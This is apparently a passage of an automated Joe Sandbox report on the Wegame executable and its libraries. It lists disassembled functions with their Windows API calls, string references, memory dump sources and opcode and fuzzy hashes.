                                                                • Instruction ID: 92a01f03e642162fd680dac8f23fb8f4d8943f5240933b7e3435b380835aa885
                                                                • Opcode Fuzzy Hash: d0a5cb4a28130304764a6daf00a8e07480ea2b12361d69007438ab561fccf194
                                                                • Instruction Fuzzy Hash: B4119A7461020AEFDB05DF68C888AADBBB5FF04304F20401DE8159B391CB75EA26DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3C4
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C404,?), ref: 0046F6E1
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C43C,?), ref: 0046F6FE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID:
                                                                • API String ID: 4113974480-0
                                                                • Opcode ID: aa1518e86f42f69b3abb8eb3fdf22dfdf4d5d5b7cd22746973db42aad26a13c3
                                                                • Instruction ID: e97731d975b648c53d0edfc182754a1827ccfc775e27ff8943e0ee96539cb342
                                                                • Opcode Fuzzy Hash: aa1518e86f42f69b3abb8eb3fdf22dfdf4d5d5b7cd22746973db42aad26a13c3
                                                                • Instruction Fuzzy Hash: EDF0BB3540020C768F04B66BF8569AD376C5A00714B50823BFC69921F2FB7CD55E85DF
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DD4
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • _CxxThrowException.VCRUNTIME140(?,6C06260C), ref: 6BE2482D
                                                                • _CxxThrowException.VCRUNTIME140(?,6C062628), ref: 6BE2484A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID:
                                                                • API String ID: 4113974480-0
                                                                • Opcode ID: 7a78846d9bd15ba0aba217c6933465fe683f2373d6af9eea76af29276a4d2c65
                                                                • Instruction ID: b41b05506f2b657bfd68ec2f44feedcfbcae505c2e06ba56434db74a0296e895
                                                                • Opcode Fuzzy Hash: 7a78846d9bd15ba0aba217c6933465fe683f2373d6af9eea76af29276a4d2c65
                                                                • Instruction Fuzzy Hash: EDF0E93680420D77DB04AAF4EC4599D377C4910698F604571BD24D18F0FF78D65AC5D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043DDA7
                                                                • ??0CThread@@QAE@XZ.COMMON(00000024), ref: 0043DDB4
                                                                • ?appdata_project_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0043DDDE
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0043DDFA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?appdata_project_folder@File_info@common@ierd_tgp@@H_prolog3_SimpleString::operator=Thread@@Vpath@filesystem@3@
                                                                • String ID:
                                                                • API String ID: 2304671556-0
                                                                • Opcode ID: 4ac6bbc186760c077c95b5b5302abb81f627a114b73e2a8fa4909bfc9a05ead2
                                                                • Instruction ID: ad07847824c5ca77c544a9ea259c026e02e2b8358e2c92397122f82973ff6107
                                                                • Opcode Fuzzy Hash: 4ac6bbc186760c077c95b5b5302abb81f627a114b73e2a8fa4909bfc9a05ead2
                                                                • Instruction Fuzzy Hash: 77016D70E00248DBCB10EBB5C4557DDBAF4AF44318F60855EE045B72C1EBBCA605CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83F7B
                                                                • ?get_qm_report_guid@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,0000001C), ref: 6BD83F84
                                                                  • Part of subcall function 6BD83DDA: __EH_prolog3_GS.LIBCMT ref: 6BD83DE4
                                                                  • Part of subcall function 6BD83DDA: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD83E2E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(0000001C), ref: 6BD83F8E
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,0000001C), ref: 6BD83F99
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@?get_qm_report_guid@common@ierd_tgp@@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?set_qm_report_guid@D@2@@std@@D@2@@std@@@Logger@1@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 2250616750-0
                                                                • Opcode ID: 630b9b31cae0c8ba0ae8c22d7662ca354cdb3127e2e7843dde4a49bea1af1557
                                                                • Instruction ID: 719afdbd8e936daa49ac4d3baa09ac83de5c2655aa7456017d2a428a21f9416b
                                                                • Opcode Fuzzy Hash: 630b9b31cae0c8ba0ae8c22d7662ca354cdb3127e2e7843dde4a49bea1af1557
                                                                • Instruction Fuzzy Hash: 98E08C31910208D7CF08E7F0D502ADC77316F24379FA00218D105AB0E0EF3C97009630
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD38E91
                                                                  • Part of subcall function 6BD36508: __EH_prolog3.LIBCMT ref: 6BD3650F
                                                                  • Part of subcall function 6BD36508: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD38EBD,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD36533
                                                                  • Part of subcall function 6BD36508: ??0?$basic_iostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@@Z.MSVCP140(?,00000000,00000008,6BD38EBD,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD3654C
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,6BFA11FC,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD38F9F
                                                                  • Part of subcall function 6BD325EA: __EH_prolog3_catch.LIBCMT ref: 6BD325F1
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000024), ref: 6BD3261F
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6BD32636
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6BD3264E
                                                                  • Part of subcall function 6BD325EA: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD327AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?width@ios_base@std@@U?$char_traits@_$D@std@@@std@@U?$char_traits@W@std@@@std@@$??0?$basic_ios@_??0?$basic_iostream@_??1?$basic_ios@?setstate@?$basic_ios@H_prolog3H_prolog3_catchH_prolog3_catch_V?$basic_streambuf@_W@std@@@1@@
                                                                • String ID: .log
                                                                • API String ID: 2979257234-299349702
                                                                • Opcode ID: cceed8db8d9de086860ce9fdf314d67091c829090d1474f24e3a6f069f3d57a8
                                                                • Instruction ID: 65639bf4128f704945ffc01c3616c9e4641ab614f89e801591815073dff9a6a5
                                                                • Opcode Fuzzy Hash: cceed8db8d9de086860ce9fdf314d67091c829090d1474f24e3a6f069f3d57a8
                                                                • Instruction Fuzzy Hash: 94318F72C04268EEDF15DFA4D946BDDB7B8AF06228F10409AE404AB151DB79AF45CB70
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 6BF70126
                                                                • socket.WS2_32(00000002,00000002,00000000), ref: 6BF70136
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: type
                                                                • API String ID: 98920635-2363381545
                                                                • Opcode ID: 996bb01e806b126a7c7c464b97fd6a18390c407f38a41eede09d3c265ab02a7a
                                                                • Instruction ID: 2dfd2361d9cb908dbbe9fba51f4d80598d0653075ce054babe47ddad0df9b7e4
                                                                • Opcode Fuzzy Hash: 996bb01e806b126a7c7c464b97fd6a18390c407f38a41eede09d3c265ab02a7a
                                                                • Instruction Fuzzy Hash: 1911CE776182805ADB401E34AC56B857BB2AF077C4F4400D0EC85CB2B2F39BEC08C211
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CopyFileW.KERNEL32(00000000,6BD49F7C,00000000,00000000,?,?,6BD60BD9,00000000,6BD49F7C,00000000,00000000,?,?,?,6BD49F7C), ref: 6BD60B8C
                                                                • GetLastError.KERNEL32(?,6BD60BD9,00000000,6BD49F7C,00000000,00000000,?,?,?,6BD49F7C), ref: 6BD60B96
                                                                Strings
                                                                • ierd_tgp::filesystem::copy_file, xrefs: 6BD60BA0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CopyErrorFileLast
                                                                • String ID: ierd_tgp::filesystem::copy_file
                                                                • API String ID: 374144340-1011023781
                                                                • Opcode ID: b8b45fe199e001b209ed20a03f4ab63037dfe5dd492b153893d99cf376d8b2b1
                                                                • Instruction ID: 310b352145337cb25e7cbd44c4a5a288adc8bc8d17bd4fb94cc689028e137840
                                                                • Opcode Fuzzy Hash: b8b45fe199e001b209ed20a03f4ab63037dfe5dd492b153893d99cf376d8b2b1
                                                                • Instruction Fuzzy Hash: 39F0B475611200AB8B005F28DC4886B7B7EFB866F6B144429F80487110E734EA55C7F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD31B5C
                                                                  • Part of subcall function 6BD3084F: __EH_prolog3.LIBCMT ref: 6BD30856
                                                                Strings
                                                                • boost unique_lock owns already the mutex, xrefs: 6BD31B6F
                                                                • boost unique_lock has no mutex, xrefs: 6BD31B96
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3_
                                                                • String ID: boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                • API String ID: 3355343447-3352860666
                                                                • Opcode ID: 3f933d1adf49c57b51f0ecc2c3ce49b52c97ce80c060f0913c8dbd52a11cb730
                                                                • Instruction ID: deb252848037ab5900fbecda824cd65eb4a7c56af697e7637adcbee17f5fcc78
                                                                • Opcode Fuzzy Hash: 3f933d1adf49c57b51f0ecc2c3ce49b52c97ce80c060f0913c8dbd52a11cb730
                                                                • Instruction Fuzzy Hash: 06F0EC30C01271DAD72CE774C416BAD77905F13B19F10845D51542F0D2DBBC5744D261
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,1001D4A9,?,?,00000000,00000001,?,1000CE1A,?), ref: 1001D709
                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,1001D4A9,?,?,00000000,00000001,?,1000CE1A,?), ref: 1001D73D
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 1001D757
                                                                • HeapFree.KERNEL32(00000000,?), ref: 1001D76E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap$FreeVirtual
                                                                • String ID:
                                                                • API String ID: 3499195154-0
                                                                • Opcode ID: 0ba27c6808261be2fa74b2d3532c30834d8d7c6565af0c5bbfb89e97ab183ee3
                                                                • Instruction ID: 381d547259dd0304dc07480b0656bd963f505275cad3580deb467ca1c8d228bd
                                                                • Opcode Fuzzy Hash: 0ba27c6808261be2fa74b2d3532c30834d8d7c6565af0c5bbfb89e97ab183ee3
                                                                • Instruction Fuzzy Hash: D9113D712002619FE3A0EF19CDC9E257BB5FB467A47204A3EF552C61F0D3709846CB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 66f83a09a8379eaf752454a3629e0b2f509811f2a76718905f26c1995eb3e276
                                                                • Instruction ID: b9dc32ad1c1d0a1dfd4c715c00cffa59326918714d8bbabd7fa00ba77060872a
                                                                • Opcode Fuzzy Hash: 66f83a09a8379eaf752454a3629e0b2f509811f2a76718905f26c1995eb3e276
                                                                • Instruction Fuzzy Hash: 2E81F8B1505F418AE3219F34D9097C7BBE0BF42319F148A1DD4FE5A292DBBA2188CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00402114,?), ref: 0040BF9A
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,00402114,?), ref: 0040C051
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040C0A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: a193b5e951c04ba6fe596a5f97ae441eeabaef0c773f1add34fceb50e13f03ab
                                                                • Instruction ID: cbed7e267662b95892dc5dae9ab6d257054e7b35893b0ec697b1107df151af65
                                                                • Opcode Fuzzy Hash: a193b5e951c04ba6fe596a5f97ae441eeabaef0c773f1add34fceb50e13f03ab
                                                                • Instruction Fuzzy Hash: DA310372A00205DBC7249B79DCC096AB799EF85360720073BF926D72D1EB389944C7DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDD2ED4
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000000,6BDD41FB,00000218,6BDD36E3,?,?), ref: 6BDD2F17
                                                                • _Open_dir.MSVCP140(?,?,?,?,?,00000000,6BDD41FB,00000218,6BDD36E3,?,?), ref: 6BDD2F50
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ??0path@filesystem@ierd_tgp@@H_prolog3_Open_dirU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@malloc
                                                                • String ID:
                                                                • API String ID: 2906514752-0
                                                                • Opcode ID: e4f1537c6fd0200a6d8a8485dd93596a8409162d317acb093d3fef4765ea85a1
                                                                • Instruction ID: 89cb6aa9f45f1bca69bf90cc2c5c6e5fcff9b5c02f4424016a580231d13f61ba
                                                                • Opcode Fuzzy Hash: e4f1537c6fd0200a6d8a8485dd93596a8409162d317acb093d3fef4765ea85a1
                                                                • Instruction Fuzzy Hash: 6821A2B1900219DBCB21DFA8C885ADDBBF5EF58314F1005DDE1889B250CB389B45DF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3A07C
                                                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,0000001C,6BD36841), ref: 6BD3A097
                                                                  • Part of subcall function 6BD38127: __EH_prolog3_GS.LIBCMT ref: 6BD38131
                                                                  • Part of subcall function 6BD38127: memset.VCRUNTIME140(?,00000000,00000040,000000A0,6BD3A0D1,?,?,?), ref: 6BD38192
                                                                • _memcpy_s.PGOCR ref: 6BD3A0FB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$_memcpy_s_time64memset
                                                                • String ID:
                                                                • API String ID: 2258469228-0
                                                                • Opcode ID: 21bf1dc57acb677fb45b238b24576a6162f08f7608d63269d496a3165486e90b
                                                                • Instruction ID: 47484d188e5c045af4b55af46890c0c6be1a4658cbb5a245f641d0fb0f87398f
                                                                • Opcode Fuzzy Hash: 21bf1dc57acb677fb45b238b24576a6162f08f7608d63269d496a3165486e90b
                                                                • Instruction Fuzzy Hash: 9C219D71800749CFCB20DFA4C5415DEFFB4AF1A220F54056EC196A7592E735A644DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,6BE80A93,C4830E8B,C4830E8B,crypto\lhash\lhash.c,0000010C,?), ref: 6BE4C35F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID:
                                                                • API String ID: 2803490479-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD8403E
                                                                • memset.VCRUNTIME140(?,00000000,00000094,0000009C,6BD86019,?,?,?,?,?,00000000,00000006,00000358,6BD85EF7,6C09F000), ref: 6BD84061
                                                                • GetVersionExA.KERNEL32(00000094), ref: 6BD8407A
                                                                  • Part of subcall function 6BD84503: __EH_prolog3_GS.LIBCMT ref: 6BD8450D
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000100,000003B0,6BD84096,?,00000010,?), ref: 6BD84553
                                                                  • Part of subcall function 6BD84503: __snprintf_s.LIBCMT ref: 6BD8456C
                                                                  • Part of subcall function 6BD84503: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 6BD84589
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000018), ref: 6BD845AC
                                                                  • Part of subcall function 6BD84503: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD845CD
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000021), ref: 6BD84601
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000210,?,00000000,00000021), ref: 6BD84614
                                                                  • Part of subcall function 6BD840E5: __EH_prolog3_GS.LIBCMT ref: 6BD840EF
                                                                  • Part of subcall function 6BD840E5: memset.VCRUNTIME140(?,00000000,00000100,00000394,6BD840AC,?,00000010,?), ref: 6BD84135
                                                                  • Part of subcall function 6BD840E5: __snprintf_s.LIBCMT ref: 6BD8414E
                                                                  • Part of subcall function 6BD840E5: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD8416B
                                                                  • Part of subcall function 6BD840E5: memset.VCRUNTIME140(?,00000000,0000022D,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD84192
                                                                  • Part of subcall function 6BD840E5: memmove.VCRUNTIME140(?,SCSIDISK), ref: 6BD841CD
                                                                  • Part of subcall function 6BD840E5: DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 6BD84200
                                                                  • Part of subcall function 6BD8477F: __EH_prolog3_GS.LIBCMT ref: 6BD84789
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,00000C68,6BD840C2,?,00000010,?), ref: 6BD847C3
                                                                  • Part of subcall function 6BD8477F: __snprintf_s.LIBCMT ref: 6BD847DC
                                                                  • Part of subcall function 6BD8477F: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD847F5
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,0000000C), ref: 6BD84818
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000800,?,00000000,0000000C), ref: 6BD84838
                                                                  • Part of subcall function 6BD8477F: DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000800,?,00000000), ref: 6BD84864
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010), ref: 6BD84880
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68), ref: 6BD84893
                                                                  • Part of subcall function 6BD8477F: memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,00000000,00000100), ref: 6BD848A6
                                                                  • Part of subcall function 6BD84304: __EH_prolog3_GS.LIBCMT ref: 6BD8430E
                                                                  • Part of subcall function 6BD84304: memset.VCRUNTIME140(?,00000000,00000100,0000017C,6BD840D8,?,00000010,?), ref: 6BD8434E
                                                                  • Part of subcall function 6BD84304: __snprintf_s.LIBCMT ref: 6BD84367
                                                                  • Part of subcall function 6BD84304: CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD84385
                                                                  • Part of subcall function 6BD84304: memset.VCRUNTIME140(?,00000000,00000018,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD843A8
                                                                  • Part of subcall function 6BD84304: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD843C9
                                                                  • Part of subcall function 6BD84304: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000221,?,?,?,?,?,?,0000017C,6BD840D8,?,00000010,?), ref: 6BD843DC
                                                                  • Part of subcall function 6BD84304: DeviceIoControl.KERNEL32(00000000,0007C088,00000000,00000021,00000000,00000221,00000000,00000000), ref: 6BD84410
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ControlDeviceH_prolog3_$CreateFile__snprintf_s$Versionmallocmemmove
                                                                • String ID:
                                                                • API String ID: 3431448289-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3A66E
                                                                • ?rdstate@ios_base@std@@QBEHXZ.MSVCP140(?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004,6BD36B89,00000000,?,00000000), ref: 6BD3A69C
                                                                • OutputDebugStringW.KERNEL32(00000000,?,?,?,00000000), ref: 6BD3A6CC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?rdstate@ios_base@std@@DebugH_prolog3_OutputString
                                                                • String ID:
                                                                • API String ID: 3811627321-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6BE26060,?,00000004,0000002C,?,?,6BD2F6E9,00000030,6BD99E93,0000000C,6BD9A739,?), ref: 6BE26016
                                                                • CloseHandle.KERNEL32(?,00000003), ref: 6BE26042
                                                                • ResumeThread.KERNEL32(?,00000003), ref: 6BE26050
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleResumeThread_beginthreadex
                                                                • String ID:
                                                                • API String ID: 3482405168-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0044EEB3
                                                                • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00000008,004435D8,?,?,?,00000000), ref: 0044EEC9
                                                                  • Part of subcall function 0044C792: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 0044C7AA
                                                                  • Part of subcall function 0044C792: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 0044C7CD
                                                                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?), ref: 0044EEE5
                                                                  • Part of subcall function 0044307F: __EH_prolog3.LIBCMT ref: 00443086
                                                                  • Part of subcall function 0044307F: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,00000000,00000000,00000000,00441B02,00000000,0000001C,?), ref: 00443091
                                                                  • Part of subcall function 0044307F: ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 004430A8
                                                                  • Part of subcall function 0044307F: std::locale::_Getfacet.LIBCPMT ref: 004430B2
                                                                  • Part of subcall function 0044307F: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 004430CB
                                                                  • Part of subcall function 0044307F: std::_Facet_Register.LIBCPMT ref: 004430E3
                                                                  • Part of subcall function 0044307F: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 00443106
                                                                  • Part of subcall function 0044C80E: ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 0044C81A
                                                                Memory Dump Source
